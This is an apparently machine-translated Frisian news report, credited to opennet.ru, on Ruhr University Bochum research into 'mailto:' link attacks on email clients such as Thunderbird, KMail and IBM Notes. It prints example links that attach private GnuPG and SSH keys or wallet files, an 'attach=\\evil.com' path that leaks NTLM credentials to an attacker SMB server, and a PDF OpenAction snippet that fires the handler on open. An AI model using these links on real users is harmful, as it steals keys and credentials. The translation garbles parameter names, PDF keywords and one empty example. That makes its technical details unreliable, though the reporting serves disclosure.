Undersikers fan Ruhr Universiteit Bochum (Dútslân) () gedrach fan e-postkliïnten by it ferwurkjen fan "mailto:"-keppelings mei avansearre parameters. Fiif fan 'e ûndersochte tweintich e-postkliïnten wiene kwetsber foar in oanfal dy't boarneferfanging manipulearre mei de parameter "taheakje". In ekstra seis e-postkliïnten wiene kwetsber foar in PGP- en S/MIME-kaaiferfangingsoanfal, en trije kliïnten wiene kwetsber foar in oanfal om de ynhâld fan fersifere berjochten te ekstrahearjen.
Links «"wurde brûkt om it iepenjen fan in e-postkliïnt te automatisearjen om in brief te skriuwen oan de adressearre opjûn yn 'e keppeling. Neist it adres kinne jo ekstra parameters opjaan as ûnderdiel fan 'e keppeling, lykas it ûnderwerp fan' e brief en in sjabloan foar typyske ynhâld. De foarnommen oanfal manipulearret de parameter "taheakje", wêrtroch jo in taheaksel taheakje kinne oan it oanmakke berjocht.
Postkliïnten Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) en Pegasus Mail wiene kwetsber foar in triviale oanfal wêrmei jo automatysk taheakje kinne elke lokale triem, oantsjutte fia in keppeling lykas "mailto:?attach=path_to_file". It bestân wurdt taheakke sûnder in warskôging wer te jaan, dus sûnder spesjale oandacht kin de brûker net fernimme dat de brief mei in taheaksel ferstjoerd wurdt.
Bygelyks, brûk in keppeling lykas "mailto:[e-post beskerme]&subject=Titel&body=Tekst&taheakje=~/.gnupg/secring.gpg" kinne jo privee kaaien fan GnuPG yn de brief ynfoegje. Jo kinne ek de ynhâld fan krypto-wallets (~/.bitcoin/wallet.dat), SSH-kaaien (~/.ssh/id_rsa) en alle bestannen dy't tagonklik binne foar de brûker stjoere. Boppedat lit Thunderbird jo groepen bestannen taheakje troch masker mei konstruksjes lykas "attach=/tmp/*.txt".
Neist lokale bestannen ferwurkje guon e-postkliïnten keppelings nei netwurk opslach en paden yn 'e IMAP-tsjinner. Benammen IBM Notes lit jo in bestân oerdrage fan in netwurkmap by it ferwurkjen fan keppelings lykas "attach=\\evil.com\dummyfile", en ek NTLM-autentikaasjeparameters ûnderskeppe troch in keppeling te stjoeren nei in SMB-tsjinner kontrolearre troch de oanfaller (it fersyk sil stjoerd wurde mei de aktuele brûker fan autentikaasjeparameters).
Thunderbird ferwurket fersiken mei súkses lykas "attach=imap:///fetch>UID>/INBOX>1/", wêrtroch jo ynhâld kinne taheakje fan mappen op 'e IMAP-tsjinner. Tagelyk wurde berjochten ophelle fan IMAP, fersifere fia OpenPGP en S/MIME, automatysk ûntsifere troch de e-postclient foardat se ferstjoere. De ûntwikkelders fan Thunderbird wiene oer it probleem yn febrewaris en yn it nûmer it probleem is al fêst (Thunderbird tûken 52, 60 en 68 bliuwe kwetsber).
Alde ferzjes fan Thunderbird wiene ek kwetsber foar twa oare oanfalfarianten op PGP en S/MIME foarsteld troch de ûndersikers. Benammen Thunderbird, lykas OutLook, PostBox, eM Client, MailMate en R2Mail2, wiene ûnderwurpen oan in kaai ferfangende oanfal, feroarsake troch it feit dat de e-postkliïnt automatysk nije sertifikaten ymportearret en ynstalleart dy't ferstjoerd binne yn S/MIME-berjochten, wat mooglik makket de oanfaller te organisearjen ferfanging fan iepenbiere kaaien al opslein troch de brûker.
De twadde oanfal, dêr't Thunderbird, PostBox en MailMate gefoelich foar binne, manipulearret de funksjes fan it meganisme foar it automatysk bewarjen fan konseptberjochten en lit, mei help fan mailto-parameters, it ûntsiferjen fan fersifere berjochten begjinne of it tafoegjen fan in digitale hantekening foar willekeurige berjochten, mei folgjende oerdracht fan it resultaat nei de IMAP-tsjinner fan 'e oanfaller. Yn dizze oanfal wurdt de sifertekst oerbrocht fia de parameter "lichem", en de tag "meta refresh" wurdt brûkt om in oprop te begjinnen nei de IMAP-tsjinner fan 'e oanfaller. Bygelyks: ' '
Om "mailto:"-keppelings automatysk te ferwurkjen sûnder ynteraksje mei de brûker, kinne spesjaal ûntworpen PDF-dokuminten brûkt wurde - de OpenAction-aksje yn PDF lit jo de mailto-hanneler automatysk starte by it iepenjen fan in dokumint:
%PDF-1.5
1 0 byb
<< /Type /Katalogus /OpenAction [2 0 R] >>
endobj
2 0 byb
<< /Type /Aksje /S /URI/URI (mailto:?body=——BEGIN PGP-BERICHT——[…])>>
endobj
Boarne: opennet.ru